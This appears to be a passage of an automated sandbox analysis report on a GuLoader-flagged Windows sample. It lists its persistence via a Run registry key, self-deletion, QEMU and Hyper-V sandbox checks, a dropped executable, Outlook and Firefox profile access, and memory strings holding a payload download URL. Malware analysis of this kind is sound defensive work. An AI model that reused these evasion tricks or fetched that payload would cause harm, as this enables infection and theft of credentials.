Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:424:304:WilStaging_02

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: Zr26f1rL6r.exe, 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, rundll32.exe, 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp, rundll32.exe, 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51750821024.000000001E890000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51752294745.000000001E9BD000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: c8ahotgz8h.exe, c8ahotgz8h.exe, 0000001E.00000002.51750821024.000000001E890000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51752294745.000000001E9BD000.00000040.00000001.sdmp
Source:	Binary string: rundll32.pdb source: Zr26f1rL6r.exe, 0000000A.00000002.47938438528.00000000000D0000.00000040.00020000.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47933760701.00000000008E5000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdbGCTL source: Zr26f1rL6r.exe, 0000000A.00000002.47938438528.00000000000D0000.00000040.00020000.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47933760701.00000000008E5000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 0000001E.00000000.51287210518.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.47309959760.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.51076893477.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.51204349057.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.51740663183.0000000000560000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_004093B3 push ebx; ret	2_2_004093B4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02313800 push 4674B5B4h; retf	2_2_02313876
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02312286 push esi; retf	2_2_02312228
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02315814 pushfd ; retf	2_2_023158DE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02315814 push ebx; retf	2_2_02315A54
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02313841 push 4674B5B4h; retf	2_2_02313876
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02310047 push ds; ret	2_2_02310051
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02310047 push ds; ret	2_2_023100B3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_023138B3 push 4674B5B4h; retf	2_2_02313876
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231388E push 4674B5B4h; retf	2_2_02313876
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_023158DF pushfd ; retf	2_2_023158DE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_023160C4 pushfd ; iretd	2_2_023160C7
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_023138CA push 4674B5B4h; retf	2_2_02313876
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02315919 push ebx; retf	2_2_02315A54
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02311918 push esi; ret	2_2_0231192F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231010F push ds; ret	2_2_023100B3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231590E pushfd ; retf	2_2_023158DE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231597F push ebx; retf	2_2_02315A54
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02312954 pushad ; ret	2_2_02312955
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_023159A2 push ebx; retf	2_2_02315A54
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_023159AE push ebx; retf	2_2_02315A54
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02315996 push ebx; retf	2_2_02315A54
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231598A push ebx; retf	2_2_02315A54
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02314DAC push ecx; ret	2_2_02314DAD
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C08CD push ecx; mov dword ptr [esp], ecx	10_2_1E8C08D6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_00573F15 push edi; ret	10_2_00573F18
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_00573F11 push edi; ret	10_2_00573F14
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_00573F1D push edi; ret	10_2_00573F20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_00573F19 push edi; ret	10_2_00573F1C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_00573F0D push edi; ret	10_2_00573F10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_00573F21 push edi; ret	10_2_00573F24

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\Grt4lhl\c8ahotgz8h.exe

Jump to dropped file

Source: C:\Program Files\Mozilla Firefox\firefox.exe

Code function: 25_2_000001BF400004B2 GetPrivateProfileSectionNamesW,GetPrivateProfileStringW,

25_2_000001BF400004B2

Source: C:\Windows\SysWOW64\rundll32.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run YNULIT20			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run YNULIT20			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Process created: /c del "C:\Users\user\Desktop\Zr26f1rL6r.exe"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: /c del "C:\Users\user\Desktop\Zr26f1rL6r.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Zr26f1rL6r.exe, 00000002.00000002.47313581673.00000000031C0000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941334690.0000000002440000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51079209491.0000000000714000.00000004.00000020.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082351665.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210744742.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292766940.00000000031A0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537329411.0000000002430000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51661997405.0000000000820000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743297176.0000000002490000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Zr26f1rL6r.exe, 0000000A.00000002.47941334690.0000000002440000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537329411.0000000002430000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51661997405.0000000000820000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743297176.0000000002490000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://ATSEASONALS.COM/GHRTT/BIN_KBJOEPXZ175.BIN
Source: c8ahotgz8h.exe, 00000016.00000002.51079209491.0000000000714000.00000004.00000020.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXET
Source: Zr26f1rL6r.exe, 00000002.00000002.47311303704.000000000060D000.00000004.00000020.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Zr26f1rL6r.exe, 00000002.00000002.47313581673.00000000031C0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082351665.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210744742.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292766940.00000000031A0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL

Source: C:\Windows\explorer.exe TID: 7852

Thread sleep time: -165000s >= -30000s

Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

Code function: 2_2_0232045A rdtsc

2_2_0232045A

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	API coverage: 1.1 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 2.8 %
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	API coverage: 1.0 %
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	API coverage: 1.0 %
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	API coverage: 1.0 %

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0040FA90 FindFirstFileW,FindNextFileW,FindClose,		15_2_0040FA90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0040FA89 FindFirstFileW,FindNextFileW,FindClose,		15_2_0040FA89

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

System information queried: ModuleInformation

Jump to behavior

Source: Zr26f1rL6r.exe, 0000000A.00000002.47939178909.0000000000828000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW8
Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: rundll32.exe, 0000000F.00000002.51919706063.00000000005EB000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW[0
Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: c8ahotgz8h.exe, 0000001C.00000003.51529209702.0000000000905000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51527691792.0000000000905000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51536267379.0000000000905000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWDmB
Source: Zr26f1rL6r.exe, 0000000A.00000003.47934144925.0000000000888000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47749514601.0000000000888000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47939814865.0000000000888000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47750467223.0000000000888000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47778020706.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48060566667.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47823943655.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47876026122.000000000D046000.00000004.00000001.sdmp, rundll32.exe, 0000000F.00000002.51919706063.00000000005EB000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51529209702.0000000000905000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51527691792.0000000000905000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51536267379.0000000000905000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51662983793.000000000097E000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51655599394.000000000097E000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000003.51735327927.0000000000853000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51741391174.00000000007E5000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001E.00000003.51734441811.0000000000853000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51742109864.0000000000853000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: c8ahotgz8h.exe, 0000001D.00000002.51662442297.0000000000914000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW(
Source: Zr26f1rL6r.exe, 00000002.00000002.47313581673.00000000031C0000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941334690.0000000002440000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51079209491.0000000000714000.00000004.00000020.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082351665.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210744742.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292766940.00000000031A0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537329411.0000000002430000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51661997405.0000000000820000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743297176.0000000002490000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Zr26f1rL6r.exe, 0000000A.00000002.47941334690.0000000002440000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537329411.0000000002430000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51661997405.0000000000820000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743297176.0000000002490000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://atseasonals.com/GHrtt/bin_kbJoepxz175.bin
Source: c8ahotgz8h.exe, 0000001C.00000002.51535505064.0000000000884000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: Zr26f1rL6r.exe, 00000002.00000002.47311303704.000000000060D000.00000004.00000020.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: firefox.exe, 00000019.00000002.50723124652.000001BF40270000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: Zr26f1rL6r.exe, 00000002.00000002.47313581673.00000000031C0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082351665.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210744742.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292766940.00000000031A0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: c8ahotgz8h.exe, 00000016.00000002.51079209491.0000000000714000.00000004.00000020.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exet
Source: c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: c8ahotgz8h.exe, 0000001E.00000003.51735327927.0000000000853000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000003.51734441811.0000000000853000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51742109864.0000000000853000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW\
Source: rundll32.exe, 0000000F.00000002.51918468762.000000000056D000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW(9_%SystemRoot%\system32\mswsock.dll
Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp	Binary or memory string: vmicvss
